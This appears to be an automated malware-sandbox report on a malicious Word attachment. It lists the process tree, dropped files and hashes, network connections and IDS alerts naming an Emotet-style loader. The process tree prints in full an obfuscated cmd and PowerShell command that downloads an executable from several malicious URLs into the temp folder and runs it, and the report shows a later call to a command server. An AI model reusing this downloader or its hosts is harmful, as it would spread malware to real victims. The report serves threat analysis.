23,46,14,56,79)do set eR7=!eR7!!Qbq:~%P,1!&&if %P equ 79 echo !eR7:*eR7!=!|cmd"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2552C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $p2173='c8071';$q198=new-object Net.WebClient;$a7203='http://duanmizukipark.com/3jd4h1qiw@http://nationalidea.info/JY3qgvTT@http://biznes.rise-up.nsk.ru/PbkT7JBm@http://34.239.95.80/Y36Xs5Psm@http://mail.hotgirlsgames.xyz/UotiOme'.Split('@');$z8451='t9549';$h3629 = '101';$j9350='z4571';$q6653=$env:temp+'\'+$h3629+'.exe';foreach($o7410 in $a7203){try{$q198.DownloadFile($o7410, $q6653);$m5042='q6192';If ((Get-Item $q6653).length -ge 40000) {Invoke-Item $q6653;$w6467='b2776';break;}}catch{}}$b4506='m9120';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2596cmdC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3068powershell $p2173='c8071';$q198=new-object Net.WebClient;$a7203='http://duanmizukipark.com/3jd4h1qiw@http://nationalidea.info/JY3qgvTT@http://biznes.rise-up.nsk.ru/PbkT7JBm@http://34.239.95.80/Y36Xs5Psm@http://mail.hotgirlsgames.xyz/UotiOme'.Split('@');$z8451='t9549';$h3629 = '101';$j9350='z4571';$q6653=$env:temp+'\'+$h3629+'.exe';foreach($o7410 in $a7203){try{$q198.DownloadFile($o7410, $q6653);$m5042='q6192';If ((Get-Item $q6653).length -ge 40000) {Invoke-Item $q6653;$w6467='b2776';break;}}catch{}}$b4506='m9120';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2324"C:\Users\admin\AppData\Local\Temp\101.exe" C:\Users\admin\AppData\Local\Temp\101.exepowershell.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Exit code:
0
Version:
0.80.00.0260-0.80.2600
3240"C:\Users\admin\AppData\Local\Temp\101.exe"C:\Users\admin\AppData\Local\Temp\101.exe
101.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Exit code:
0
Version:
0.80.00.0260-0.80.2600
3096"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe101.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Exit code:
0
Version:
0.80.00.0260-0.80.2600
3668"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Creative Technology Ltd
Integrity Level:
MEDIUM
Description:
Thk3216
Version:
0.80.00.0260-0.80.2600
Total events
1 790
Read events
1 309
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE979.tmp.cvr
MD5:
SHA256:
2956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C6CA305.jpg
MD5:
SHA256:
3068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0W78QS8T4M2Y2MQCQUVC.temp
MD5:
SHA256:
3068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f7b2.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3068powershell.exeC:\Users\admin\AppData\Local\Temp\101.exeexecutable
MD5:90F9A476BCD657B686CD686FE6A5BC82
SHA256:30D9A29A2490395DF536803D98AFCCBCA2E22B70755759DF08DE7943231AFFCE
2956WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D37602392B58725B3F092A1181F3B2FF
SHA256:AB5B3951CB0F508E9E6FC03654CA214D3C33DB5A519C7233CB1AFAD880D7656F
2956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$titled-attachment-01222019.docpgc
MD5:6A8501951230ABADAA1BE66D5C1FA98F
SHA256:878E84130B0643A63F91D8CED1BE5E232AED1DF07B0A662DEE95E122954C30AA
3240101.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:90F9A476BCD657B686CD686FE6A5BC82
SHA256:30D9A29A2490395DF536803D98AFCCBCA2E22B70755759DF08DE7943231AFFCE
2956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:ED3399AF66BC415B3CE1A4B906924F56
SHA256:7380A70E48A17C3C57E74DF3008E9B4BC9E39BD30FA3D7CD648DE4D2935D5B8A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3668
wabmetagen.exe
GET
200.125.113.60:8080
http://200.125.113.60:8080/
AR
malicious
3068
powershell.exe
GET
200
45.252.248.20:80
http://duanmizukipark.com/3jd4h1qiw/
VN
executable
573 Kb
malicious
3068
powershell.exe
GET
301
45.252.248.20:80
http://duanmizukipark.com/3jd4h1qiw
VN
html
617 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3668
wabmetagen.exe
200.125.113.60:8080
Telecentro S.A.
AR
malicious
3068
powershell.exe
45.252.248.20:80
duanmizukipark.com
AZDIGI Corporation
VN
malicious

DNS requests

Domain
IP
Reputation
duanmizukipark.com
  • 45.252.248.20
malicious

Threats

PID
Process
Class
Message
3068
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3068
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3068
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3068
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3068
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info